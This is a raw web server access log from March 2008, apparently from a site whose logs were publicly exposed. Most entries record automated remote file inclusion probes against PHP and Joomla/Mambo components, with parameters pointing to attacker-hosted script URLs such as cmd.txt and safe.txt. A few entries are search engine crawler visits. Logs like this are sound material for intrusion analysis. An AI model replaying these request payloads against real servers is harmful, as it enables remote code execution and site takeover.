71.6.167.234 - - [04/Mar/2008:05:03:18 -0800] "GET /SQuery/lib/flashpoint.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:03:22 -0800] "GET /index.php?include_location=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.27 - - [04/Mar/2008:05:04:00 -0800] "GET /logs/access_080211.log/p.php?p=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [04/Mar/2008:05:04:01 -0800] "GET /logs/p.php?p=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.148.27 - - [04/Mar/2008:05:04:42 -0800] "GET /logs/access_080117.log/p.php?p=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:04:48 -0800] "GET /logs/access_080216.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:04:48 -0800] "GET /admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:04:49 -0800] "GET /logs/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:05:06:34 -0800] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.112.178 - - [04/Mar/2008:05:06:43 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/p4n93r4nk0d0k/computare/heer.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.112.178 - - [04/Mar/2008:05:06:44 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.geocities.com/p4n93r4nk0d0k/computare/heer.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:07:22 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:05:08:30 -0800] "GET //postscript/postscript.php?p_mode=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:05:08:30 -0800] "GET /logs//postscript/postscript.php?p_mode=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:09:42 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:09:44 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.20.142 - - [04/Mar/2008:05:10:04 -0800] "GET /logs/access_070828.log HTTP/1.0" 200 86379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:05:10:12 -0800] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
72.55.179.18 - - [04/Mar/2008:05:10:12 -0800] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:10:41 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:10:42 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:10:42 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:10:56 -0800] "GET /logs/access_080211.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:10:57 -0800] "GET /logs/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:11:09 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:11:19 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:11:19 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:11:19 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:11:54 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:05:12:26 -0800] "GET /logs/errors.php?error=http://yallaserver.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
208.116.41.19 - - [04/Mar/2008:05:12:26 -0800] "GET /errors.php?error=http://yallaserver.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:12:38 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:12:38 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:12:38 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [04/Mar/2008:05:12:45 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jasungman.com/formmail/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:12:51 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:12:56 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:12:57 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:13:27 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:05:13:29 -0800] "GET //admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:05:13:29 -0800] "GET /logs//admin.php?include_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:13:31 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:05:13:39 -0800] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.115 - - [04/Mar/2008:05:14:11 -0800] "GET /logs/access_071102.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.115 - - [04/Mar/2008:05:14:15 -0800] "GET /logs/access_070717.log HTTP/1.1" 200 2718 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
66.249.73.115 - - [04/Mar/2008:05:14:25 -0800] "GET / HTTP/1.1" 200 3094 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:14:30 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:14:31 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:14:31 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:05:14:31 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:05:14:46 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:05:14:46 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:05:14:47 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:14:52 -0800] "GET /logs/access_080216.log/confirm.php?include_location=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:05:14:52 -0800] "GET /logs/access_080103.log/index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:14:52 -0800] "GET /logs/confirm.php?include_location=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:15:09 -0800] "GET /logs/access_080216.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:15:09 -0800] "GET /admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:15:09 -0800] "GET /logs/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:15:10 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:05:16:22 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:16:33 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:16:33 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:16:34 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.36.33 - - [04/Mar/2008:05:16:47 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [04/Mar/2008:05:16:47 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [04/Mar/2008:05:16:47 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.73.115 - - [04/Mar/2008:05:16:54 -0800] "GET /bikes/dteel/EQ2/ HTTP/1.1" 200 841 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
202.44.52.210 - - [04/Mar/2008:05:17:11 -0800] "GET /logs/access_080123.log/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.44.52.210 - - [04/Mar/2008:05:17:11 -0800] "GET /tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.44.52.210 - - [04/Mar/2008:05:17:12 -0800] "GET /logs/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.44.52.210 - - [04/Mar/2008:05:17:46 -0800] "GET /logs/access_080119.log/tiny_includes/config.php?dir_ws=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:05:17:50 -0800] "GET /?mosConfig_absolute_path=http://albinfo.freehostia.com/test.txt??? HTTP/1.1" 200 3094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:05:17:51 -0800] "GET /logs/?mosConfig_absolute_path=http://albinfo.freehostia.com/test.txt??? HTTP/1.1" 200 37260 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:05:17:51 -0800] "GET //appserv/main.php?appserv_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:05:17:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
74.52.2.130 - - [04/Mar/2008:05:18:01 -0800] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.188.30.149 - - [04/Mar/2008:05:18:09 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.36.33 - - [04/Mar/2008:05:18:10 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:05:18:17 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.169.155.140 - - [04/Mar/2008:05:18:57 -0800] "GET /logs/access_080122.log/administrator/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [04/Mar/2008:05:18:57 -0800] "GET /administrator/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [04/Mar/2008:05:18:57 -0800] "GET /logs/administrator/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:19:19 -0800] "GET /logs/access_080216.log/index.php?include_location=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:19:19 -0800] "GET /logs/index.php?include_location=http://www.bieneis.com/bieneis.com/_daten/nuke/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:19:23 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:19:24 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:19:24 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:19:26 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:19:26 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [04/Mar/2008:05:19:26 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.shiesty.com/languages/.inc/read.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:19:55 -0800] "GET /logs/access_080122.log//header.php?base_folder=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:19:55 -0800] "GET //header.php?base_folder=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:19:56 -0800] "GET /logs//header.php?base_folder=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.78.1.5 - - [04/Mar/2008:05:19:57 -0800] "GET /logs/access_080107.log//header.php?base_folder=http://panglima.freetzi.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:05:19:58 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:05:20:00 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:05:20:00 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:05:20:01 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:05:20:09 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:05:20:39 -0800] "GET /index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:05:20:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:05:20:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.angelfire.com/linux/ryu1/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:05:20:46 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.angelfire.com/linux/ryu1/b?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:05:20:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
217.195.204.234 - - [04/Mar/2008:05:20:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.angelfire.com/linux/ryu1/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:21:32 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:21:32 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:05:21:33 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.200 - - [04/Mar/2008:05:21:48 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jasungman.com/formmail/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
124.217.247.200 - - [04/Mar/2008:05:21:48 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jasungman.com/formmail/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:21:56 -0800] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
87.106.27.140 - - [04/Mar/2008:05:21:56 -0800] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://sonicsr.com/bodo.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
124.217.247.200 - - [04/Mar/2008:05:22:15 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.jasungman.com/formmail/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
